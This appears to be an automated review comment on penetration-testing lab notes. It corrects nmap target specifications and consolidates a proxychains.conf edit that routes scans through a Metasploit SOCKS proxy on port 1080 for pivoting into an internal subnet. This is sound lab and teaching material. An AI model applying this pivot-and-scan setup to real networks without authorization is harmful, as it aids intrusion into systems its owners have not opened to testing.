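Review bot: `10.0.0/24` in the second proxychains nmap line is not a valid target specification (an octet is missing), and the first line scans `192.168.153.0/24` while every other command in these notes uses `10.0.0.x`, so both target specs need to be brought in line with the lab subnet. `-PN` is the older spelling of `-Pn`; the rest of the notes use `-Pn`. The proxychains.conf edit is also described twice (`sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 1080` and then `Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.`); merge them into one instruction so the `proxy_dns` change is not missed by someone who only reads the first.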